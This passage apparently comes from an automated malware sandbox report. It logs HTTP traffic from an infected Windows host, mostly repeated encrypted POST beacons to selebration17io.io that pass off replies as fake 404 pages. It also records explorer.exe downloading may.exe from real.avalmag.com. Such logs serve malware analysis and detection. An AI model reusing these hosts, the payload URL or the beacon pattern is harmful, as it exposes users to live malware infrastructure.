                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 16 6e 5d 32 0f f1 4b 5b a3 a1 b0 97 7f 32 6c 54 f3 8a cf 75 97 0c 81 5d 60 3e 43 d6 41 c2 6a 94 58 9d 2b e2 fe ea 0e e3 04 1d e7 9b d8 c0 08 59 88 af 72 d8 90 93 64 8f aa 0a a7 7a 5e 4b 82 e4 91 d1 9b 01 45 03 14 f2 36 f8 37 33 74 a0 40 77 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c1 00 0a c4 8f 54 d7 07 53 53 fa cb 1f 9e fd 09 50 0a ee 8c 85 77 7e e5 f8 ff 78 2d 55 db c4 01 03 13 8c 0a e1 92 24 18 4f c5 03 e3 d0 a1 61 7e de e5 69 a9 19 17 7e 4f af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 4a ea 96 be 35 51 61 9a d4 3e 7c 8a 28 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 3a 6f 33 6c 31 7c 0a 8d cf 4c eb 0e 98 eb 7e 71 eb a0 ea 1a a8 9f 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 0b 35 b9 2e ea cc 23 f2 c5 01 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 be f0 9d 4b 7f 55 40 b7 66 7b 39 d6 e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b ea fd d0 8e 82 11 e8 e4 1f fe ae 90 4e b1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 79 15 ab 7e 08 0f 75 8f b7 af 57 a3 6b 1e 85 1f d4 ec 67 91 9c 39 06 f1 2c ee a1 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 2c a2 8b 8b e1 a2 75 d7 9c a8 c3 e0 2b 69 bb bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 a3 a1 bb 37 00 80 e3 1c 5e 8e f4 52 48 24 35 96 4d 7b e6 17 3f 3c ea 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 ee b1 e7 aa 8d 41 f9 c3 a7 0d 2f c9 d4 5f b9 52 43 9c c5 00 62 18 aa 0c f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 83 e8 c8 ef b3 81 6e e8 8b 23 1e ac 11 24 77 b3 0e b3 94 19 13 28 b9 8c f5 38 82 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 cd 43 d9 2d 4f fb 31 ba 2c f6 ff 18 4a 21 06 7d 42 c3 94 96 7f c8 29 27 9d 1f 29 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 20 38 30 9f f8 e5 ea 2c fe b1 8e 98 c2 5a 5c 32 d0 39 ef 32 42 92 3b 16 12 97 17 e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 57 1c 5c 1a 38 c1 6a 2d 72 8f 69 f9 24 3d 2a 01 6e d1 e2 58 b3 cc 95 25 1c b0 4c 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e 93 85 bc 03 e1 04 07 ff 2a 82 05 85 64 8b 97 2e 60 20 25 93 8b b4 e5 fe d6 9e 2d c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 ef 84 ed 25 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 28 2b 77 33 c3 00 45 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 3f 26 58 c5 07 1f ad d6 46 43 7c 20 4b b2 cf dd a9 8c 29 02 3d 89 31 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*n]2K[2lTu]`>CAjX+Yrdz^KE673t@wp"XJ3Ob>!ZC:>TSSPw~x-U$Oa~i~ODzN,J5Qa>|(HkJk?a]V4:o3l1|L~qJO;yLuVW5.#1er+Lc1<'i3FHU=hKU@f{9(B@w=fd3Dw)pKNTUo)2([y~uWkg9,[}PmC,u+iz(Fzk#7^RH$5M{?<~Mpvn%A/_RCb@3%}n#$w(8RLEsC-O1,J!}B)')BV`se%x 80,Z\292B;Q =TZW\8j-ri$=*nX%Lr^3m~*d.` %-nJei%:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=(+w3E=y$g}?&XFC| K)=1n.rG)"@BoU
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:26.619272947 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://fxybxkcdupbmqs.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 198
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:26.875036955 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:26.917269945 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://plakymyrifcp.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 261
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.173749924 CET240INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 34 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 0f 90 10 dd 1a d3 e0 01 af 24 f0 2d 0b 5a 38 fd 29 00 65 98 59 66 1b 7d d7 e2 89 bd cc 6a c1 7e 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 34Uys/~(`:$-Z8)eYf}j~/0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:30.228667021 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ctertjtbajrnxyha.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 172
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:30.485552073 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:30 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:30.746709108 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://gxeoatmtdelfcs.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 123
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.002487898 CET259INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:30 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:36.280669928 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://xmtbatfindi.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 139
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:36.536807060 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:36.541537046 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://xpydamorejaxqinh.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:36.797749043 CET232INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:47.475882053 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ksdsewppbovbyh.com/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:47.732340097 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                1192.168.2.649709172.67.213.22804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.460700989 CET170OUTGET /data/pdf/may.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Host: real.avalmag.com
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796030998 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7668707
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=may.exe
                                                                                                                                                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DDj5Jd8oE8KTt%2BYx3Q0bfwbun6txohwpNW9FRZFd1qsdYs726gbU%2Be4bAdZPDogNA9q07RDjCx%2FrCEi4ZTdVD%2FXVXxt4CbAQKi6zftp%2BQJN%2FQyMWyzOEbFx%2B5iDAFa2uJB%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7ebff8506f2-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
